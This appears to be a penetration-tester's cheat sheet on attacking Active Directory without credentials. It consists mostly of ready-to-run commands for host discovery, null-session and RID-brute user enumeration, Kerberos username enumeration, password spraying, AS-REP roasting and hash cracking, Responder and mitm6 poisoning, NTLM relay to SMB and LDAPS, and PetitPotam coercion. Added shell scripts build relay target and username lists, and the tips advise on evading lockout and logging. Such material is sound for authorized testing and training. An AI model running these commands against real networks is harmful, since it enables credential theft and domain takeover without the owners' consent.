Unauthenticated Enumeration

Everything you can pull from an AD environment without a single credential. Network discovery, null sessions, guest access, and protocol-level enumeration.


Network Discovery

Ping sweep to find live hosts on the subnet.

terminal.log
root@localhost:~# nmap -sn <SUBNET>/24 -oA discovery

Fast full port scan across the range.

terminal.log
root@localhost:~# masscan -p1-65535 <SUBNET>/24 --rate=1000 -oL ports.txt

Targeted service scan on common AD ports.

terminal.log
root@localhost:~# nmap -sC -sV -p 53,88,135,139,389,445,464,593,636,3268,3269,5985,5986,9389 <TARGET> -oA ad_services

Discover SMB-enabled hosts with NetExec (also reveals hostnames, domain name, OS version, and signing status).

terminal.log
root@localhost:~# nxc smb <SUBNET>/24

Discover WinRM-enabled hosts.

terminal.log
root@localhost:~# nxc winrm <SUBNET>/24

Discover MSSQL instances.

terminal.log
root@localhost:~# nxc mssql <SUBNET>/24

Discover RDP-enabled hosts.

terminal.log
root@localhost:~# nxc rdp <SUBNET>/24
Tip
The initial nxc smb sweep is your best first command: hostnames, domain name, OS version and SMB signing status in one shot. It does not label DCs, so cross-check against the hosts with 88/389/636 open in the service scan above.
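Added example (not from the page): a small shell script that turns a saved nxc smb sweep into a host inventory, a domain summary, an SMBv1 list and a relay target list. The sweep lines are constructed, and the banner layout (IP in column 2, then `(name:..) (domain:..) (signing:..) (SMBv1:..)` tokens) is an assumption about nxc's default output; compare against your own sweep before trusting the columns.

```shell
#!/usr/bin/env bash
# Added example, not from the page: parse a saved `nxc smb <SUBNET>/24` sweep
# (save one with: nxc smb <SUBNET>/24 | tee smb_sweep.log) into an inventory
# and a relay target list. Sample lines are constructed; the banner layout
# is an assumption about nxc's default output.

NXC_SAMPLE='SMB  10.10.10.5   445  DC01    [*] Windows Server 2019 Build 17763 x64 (name:DC01) (domain:corp.local) (signing:True) (SMBv1:False)
SMB  10.10.10.20  445  FS01    [*] Windows Server 2016 Build 14393 x64 (name:FS01) (domain:corp.local) (signing:False) (SMBv1:True)
SMB  10.10.10.31  445  WS-042  [*] Windows 10.0 Build 19041 x64 (name:WS-042) (domain:corp.local) (signing:False) (SMBv1:False)
SMB  10.10.10.40  445  NAS01   [*] Unix - Samba (name:NAS01) (domain:WORKGROUP) (signing:False) (SMBv1:False)'

# smb_inventory <sweep.log>: one line per host: ip name domain signing smbv1
smb_inventory() {
    awk '
        /^SMB / && /\(name:/ {
            ip = $2; name = dom = sign = v1 = ""
            for (i = 1; i <= NF; i++) {
                v = $i; sub(/\)$/, "", v)            # strip closing paren
                if      (sub(/^\(name:/,    "", v)) name = v
                else if (sub(/^\(domain:/,  "", v)) dom  = v
                else if (sub(/^\(signing:/, "", v)) sign = v
                else if (sub(/^\(SMBv1:/,   "", v)) v1   = v
            }
            print ip, name, dom, sign, v1
        }' "$1"
}

# relay_targets <sweep.log>: domain-joined hosts with signing off, one IP per
# line (the format ntlmrelayx -tf expects). WORKGROUP boxes are dropped: a
# relayed domain credential is rarely valid on a standalone host.
relay_targets() {
    smb_inventory "$1" | awk '$4 == "False" && toupper($3) != "WORKGROUP" { print $1 }'
}

# smbv1_hosts <sweep.log>: hosts still answering SMBv1 (a finding on its own)
smbv1_hosts() {
    smb_inventory "$1" | awk '$5 == "True" { print $1, $2 }'
}

# domains_seen <sweep.log>: distinct domain names with host counts
domains_seen() {
    smb_inventory "$1" | awk '{ n[$3]++ } END { for (d in n) print d, n[d] }' | LC_ALL=C sort
}

SWEEP_LOG="${1:-}"
if [ -z "$SWEEP_LOG" ]; then                 # no log path given: use the sample
    SWEEP_LOG=$(mktemp)
    printf '%s\n' "$NXC_SAMPLE" > "$SWEEP_LOG"
fi

echo "== inventory ==";     smb_inventory "$SWEEP_LOG"
echo "== domains ==";       domains_seen  "$SWEEP_LOG"
echo "== SMBv1 hosts ==";   smbv1_hosts   "$SWEEP_LOG"
echo "== relay targets =="; relay_targets "$SWEEP_LOG"
# relay_targets "$SWEEP_LOG" > relay_targets.txt   # feed to ntlmrelayx -tf
```

Run it as `./sweep_parse.sh smb_sweep.log`; with no argument it runs on the embedded sample. The WORKGROUP filter is the useful part: `--gen-relay-list` hands you every unsigned host, and standalone NAS boxes in that list just waste relay attempts.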

Null & Guest Session Checks

SMB

Test null session. [SMB]

terminal.log
root@localhost:~# nxc smb <DC_IP> -u '' -p ''

Test guest access. [SMB]

terminal.log
root@localhost:~# nxc smb <DC_IP> -u 'guest' -p ''

LDAP

Test anonymous LDAP bind and read. [LDAP]

terminal.log
root@localhost:~# ldapsearch -H ldap://<DC_IP> -x -b 'DC=domain,DC=local'
Tip
AD accepts an anonymous bind by default but only serves RootDSE that way; reading objects anonymously requires the forest's dSHeuristics seventh character set to 2, which is rare but still turns up on old or migrated forests. If the search above returns entries, you can enumerate users, groups, and OUs without any credentials at all.

RPC

Test null session via RPC. [RPC]

terminal.log
root@localhost:~# rpcclient -U '' -N <DC_IP> -c 'enumdomusers'
Tip
RPC null sessions are hit or miss: the SAMR calls behind enumdomusers are blocked by the default "Do not allow anonymous enumeration of SAM accounts" setting on modern DCs. Always try it, but don't count on it.

SMB Enumeration (No Creds)

Share Enumeration

List shares via null session. [SMB]

terminal.log
root@localhost:~# nxc smb <DC_IP> -u '' -p '' --shares

List shares with guest access. [SMB]

terminal.log
root@localhost:~# nxc smb <DC_IP> -u 'guest' -p '' --shares

User Enumeration

Enumerate domain users via RID brute-forcing (works if null session is allowed). [SMB]

terminal.log
root@localhost:~# nxc smb <DC_IP> -u '' -p '' --rid-brute 10000

RID brute with guest. [SMB]

terminal.log
root@localhost:~# nxc smb <DC_IP> -u 'guest' -p '' --rid-brute 10000
Tip
RID brute-forcing is one of the most reliable unauthenticated user enumeration methods because it translates SIDs through LSA lookups rather than enumerating SAMR, and DCs frequently allow the former over a null session while blocking the latter. The default ceiling is 4000; bump it to 10000 or higher to catch service accounts with high RIDs.

Password Policy

Enumerate password policy (check before spraying). [SMB]

terminal.log
root@localhost:~# nxc smb <DC_IP> -u '' -p '' --pass-pol

With guest. [SMB]

terminal.log
root@localhost:~# nxc smb <DC_IP> -u 'guest' -p '' --pass-pol
Tip
Always pull the password policy before spraying. You need the lockout threshold and the lockout-counter reset window (observation window) to stay under the radar: every spray round costs one badPwdCount per user on whichever DC answered.

SMB Signing

Identify hosts with SMB signing disabled (relay targets). [SMB]

terminal.log
root@localhost:~# nxc smb <SUBNET>/24 --gen-relay-list relay_targets.txt
Tip
Hosts with SMB signing disabled go straight into your ntlmrelayx target list. Run this early.

LDAP Enumeration (No Creds)

These only work if the DC allows anonymous reads beyond RootDSE (see the anonymous bind check above).

Enumerate base naming context. [LDAP]

terminal.log
root@localhost:~# ldapsearch -H ldap://<DC_IP> -x -s base -b '' namingContexts

Dump users (anonymous). The objectCategory clause excludes computer accounts, which are also objectClass=user in AD. [LDAP]

terminal.log
root@localhost:~# ldapsearch -H ldap://<DC_IP> -x -b 'DC=domain,DC=local' '(&(objectCategory=person)(objectClass=user))' sAMAccountName

Dump groups (anonymous). [LDAP]

terminal.log
root@localhost:~# ldapsearch -H ldap://<DC_IP> -x -b 'DC=domain,DC=local' '(objectClass=group)' cn

Dump computers (anonymous). [LDAP]

terminal.log
root@localhost:~# ldapsearch -H ldap://<DC_IP> -x -b 'DC=domain,DC=local' '(objectClass=computer)' cn dNSHostName
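Added example (not from the page): a shell function that turns the ldapsearch output above into the users.txt / computers.txt that kerbrute, GetNPUsers and the spray step want. Two LDIF details trip people up and are handled here: long lines are folded (continuation lines start with one space; `-o ldif-wrap=no` on ldapsearch avoids it), and values that are non-ASCII or start/end with a space arrive base64-encoded behind `attr::`. The LDIF below is constructed; the domain and accounts are not real.

```shell
#!/usr/bin/env bash
# Added example, not from the page: extract attribute values from ldapsearch
# LDIF output, unfolding continuation lines and decoding base64 ("::") values.
# The LDIF sample is constructed.

LDIF_SAMPLE='# extended LDIF
#
# LDAPv3
# base <DC=corp,DC=local> with scope subtree
# filter: (&(objectCategory=person)(objectClass=user))
# requesting: sAMAccountName
#

# Administrator, Users, corp.local
dn: CN=Administrator,CN=Users,DC=corp,DC=local
sAMAccountName: Administrator

# svc-backup, Service Accounts, Tier 1, corp.local
dn: CN=svc-backup,OU=Service Accounts,OU=Tier 1,OU=Corporate Infrastructure,D
 C=corp,DC=local
sAMAccountName: svc-backup

# jose.nunez, Users, corp.local
dn: CN=jose.nunez,CN=Users,DC=corp,DC=local
sAMAccountName:: am9zZS5udW5leiA=

# search result
search: 2
result: 0 Success

# numResponses: 4
# numEntries: 3'

# ldif_values <attr> <file>: print every value of <attr>, one per line.
# Folded lines are joined first; "attr:: <b64>" values are decoded as-is,
# so a sAMAccountName with a trailing space (a real AD quirk) survives.
ldif_values() {
    attr="$1"
    sed -e :a -e '$!N;s/\n //;ta' -e 'P;D' "$2" |
    while IFS= read -r line; do
        case "$line" in
            "$attr:: "*) printf '%s' "${line#"$attr:: "}" | base64 -d; printf '\n' ;;
            "$attr: "*)  printf '%s\n' "${line#"$attr: "}" ;;
        esac
    done
}

# Typical use against a DC (not run here):
#   ldapsearch -H ldap://<DC_IP> -x -b 'DC=corp,DC=local' \
#     '(&(objectCategory=person)(objectClass=user))' sAMAccountName > users.ldif
#   ldif_values sAMAccountName users.ldif > users.txt
#   ldapsearch -H ldap://<DC_IP> -x -b 'DC=corp,DC=local' \
#     '(objectClass=computer)' dNSHostName > computers.ldif
#   ldif_values dNSHostName computers.ldif > computers.txt

LDIF_FILE=$(mktemp)
printf '%s\n' "$LDIF_SAMPLE" > "$LDIF_FILE"
# Bracket each value so the trailing space on the third account is visible
ldif_values sAMAccountName "$LDIF_FILE" | sed 's/^/[/; s/$/]/'
```

The base64 case matters more than it looks: a trimmed "jose.nunez" will never authenticate if the real sAMAccountName is "jose.nunez " with the space, and every tool downstream of users.txt will report that account as non-existent.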

RPC Enumeration (No Creds)

Enumerate domain users. [RPC]

terminal.log
root@localhost:~# rpcclient -U '' -N <DC_IP> -c 'enumdomusers'

Enumerate domain groups. [RPC]

terminal.log
root@localhost:~# rpcclient -U '' -N <DC_IP> -c 'enumdomgroups'

Get domain password policy. [RPC]

terminal.log
root@localhost:~# rpcclient -U '' -N <DC_IP> -c 'getdompwinfo'

Query the LSA policy for the domain name and domain SID. [RPC]

terminal.log
root@localhost:~# rpcclient -U '' -N <DC_IP> -c 'lsaquery'

Enumerate printers to confirm the Print Spooler answers over RPC (a PrinterBug precondition; the coercion itself needs a domain account). [RPC]

terminal.log
root@localhost:~# rpcclient -U '' -N <DC_IP> -c 'enumprinters'

DNS Enumeration

Zone transfer attempt (rarely works, but always worth trying). [DNS]

terminal.log
root@localhost:~# dig axfr <DOMAIN_FQDN> @<DC_IP>

Reverse lookup sweep to map IPs to hostnames.

terminal.log
root@localhost:~# nmap -sn <SUBNET>/24 -oG - | awk '/Up/{print $2}' | while read -r ip; do echo "$ip $(dig +short -x "$ip" @<DC_IP>)"; done
Tip
DNS zone transfers are almost always blocked on DCs, but it costs nothing to try. If it works, you get the full record set for free.

Kerberos Enumeration (No Creds)

Username Enumeration

Enumerate valid usernames via Kerberos (fast, and no lockout risk: the AS-REQ carries no password, so badPwdCount is untouched). [Kerberos]

terminal.log
root@localhost:~# kerbrute userenum -d <DOMAIN_FQDN> --dc <DC_IP> usernames.txt
Tip
Kerberos user enumeration doesn't generate the 4625/4776 logon failures SMB does; it surfaces as 4768 with KDC_ERR_C_PRINCIPAL_UNKNOWN only where Kerberos Authentication Service auditing is enabled. Use a good wordlist (e.g., xato-net-10-million-usernames.txt, combined with common AD naming conventions like first.last).
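Added example (not from the page): a shell function that expands "First Last" names gathered from OSINT into the username formats AD domains commonly use, so a single kerbrute userenum run reveals which convention the target follows. It goes beyond the tip's first.last by emitting eight formats per name; the names are constructed.

```shell
#!/usr/bin/env bash
# Added example, not from the page: build username candidates from real names
# for kerbrute userenum. Sample names are constructed.

NAMES_SAMPLE="Alice Smith
Bob O'Brien
Carol van der Berg
Madonna"

# username_candidates: reads "First Last" names on stdin, prints unique
# candidates in C-locale sorted order. Non-letters (apostrophes, hyphens,
# spaces in multi-word surnames) are dropped, which is how most provisioning
# scripts build sAMAccountName. Single-token names are skipped.
username_candidates() {
    tr 'A-Z' 'a-z' | while IFS= read -r name; do
        [ -z "$name" ] && continue
        first=${name%% *}
        rest=${name#* }
        [ "$rest" = "$name" ] && continue              # no surname to work with
        first=$(printf '%s' "$first" | tr -cd 'a-z')
        last=$(printf '%s' "$rest"  | tr -cd 'a-z')
        { [ -z "$first" ] || [ -z "$last" ]; } && continue
        finit=${first%"${first#?}"}                     # first initial
        linit=${last%"${last#?}"}                       # last initial
        printf '%s\n' "$first.$last" "$finit$last" "$finit.$last" "$first$linit" \
                      "${first}_${last}" "$last$finit" "$last.$first" "$first"
    done | LC_ALL=C sort -u
}

printf '%s\n' "$NAMES_SAMPLE" | username_candidates
# Then:  printf '%s\n' "$NAMES_SAMPLE" | username_candidates > candidates.txt
#        kerbrute userenum -d <DOMAIN_FQDN> --dc <DC_IP> candidates.txt
```

Once kerbrute confirms which format exists (say, only flast hits), regenerate the list in that one format for the rest of the name pool; the other seven formats are noise from then on.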

AS-REP Roasting

Extract AS-REP hashes for accounts with Kerberos pre-auth disabled. [Kerberos]

terminal.log
root@localhost:~# impacket-GetNPUsers <DOMAIN>/ -dc-ip <DC_IP> -usersfile users.txt -format hashcat -outputfile asrep_hashes.txt

Auto-enumerate users via LDAP if anonymous reads are allowed, then request AS-REPs for any account with pre-auth disabled. [Kerberos]

terminal.log
root@localhost:~# impacket-GetNPUsers <DOMAIN>/ -dc-ip <DC_IP> -request -format hashcat -outputfile asrep_hashes.txt

Crack with hashcat (mode 18200 covers the default RC4 etype 23 hashes; AES etype 17/18 AS-REPs need the separate AS-REP modes added in newer hashcat releases).

terminal.log
root@localhost:~# hashcat -m 18200 asrep_hashes.txt wordlist.txt

Password Spraying

Spray a single password against discovered usernames. [SMB]

terminal.log
root@localhost:~# nxc smb <DC_IP> -u users.txt -p '<PASSWORD>' --continue-on-success

Kerberos-based password spray (no 4625/4776 logon-failure events, but every wrong guess still increments badPwdCount and counts toward lockout). [Kerberos]

terminal.log
root@localhost:~# kerbrute passwordspray -d <DOMAIN_FQDN> --dc <DC_IP> users.txt '<PASSWORD>'
Tip
Kerberos spraying is stealthier than SMB spraying, not safer: stay within the lockout threshold and observation window you pulled from the password policy earlier.

Poisoning & Relay (No Creds)

LLMNR / NBT-NS / mDNS Poisoning

Capture NTLMv2 hashes on the local network.

terminal.log
root@localhost:~# responder -I eth0 -dwPv
Tip
Use -A for analyze mode first to see who is asking for what without poisoning anything. Check responder -h before reusing an old flag string: in Responder 3.x, -d enables DHCP answer injection, which can disrupt client networking and is not needed for hash capture, and -P forces authentication on the proxy.

SMB Relay

Relay captured NTLM auth to hosts with SMB signing disabled.

terminal.log
root@localhost:~# impacket-ntlmrelayx -tf relay_targets.txt -smb2support

Relay to LDAPS to create a machine account or set RBCD. The machine-account step needs TLS, hence ldaps; and SMB-sourced authentication cannot be relayed to LDAP at all because the SMB client negotiates signing, so this target wants HTTP sources (WPAD, mitm6 below). [LDAP]

terminal.log
root@localhost:~# impacket-ntlmrelayx -t ldaps://<DC_IP> --delegate-access

IPv6 DNS Poisoning

Poison IPv6 DNS via WPAD and relay to LDAP. [IPv6] [LDAP]

terminal.log
# Terminal 1 (poison)
root@localhost:~# mitm6 -d <DOMAIN_FQDN>

# Terminal 2 (relay to LDAP)
root@localhost:~# impacket-ntlmrelayx -6 -t ldaps://<DC_IP> --delegate-access -wh wpad.<DOMAIN_FQDN>
Tip
mitm6 + ntlmrelayx to LDAP is devastating. Can create machine accounts and set RBCD for instant lateral movement without ever having credentials.

Unauthenticated Coercion

Coerce authentication from unpatched DCs using PetitPotam (no creds). [MS-EFSRPC]

terminal.log
root@localhost:~# python3 PetitPotam.py <LISTENER_IP> <DC_IP>
Tip
Unauthenticated PetitPotam was patched (CVE-2021-36942, August 2021), but many environments are still behind. Always try it; against patched hosts the same EFSRPC coercion still works once you hold any domain account.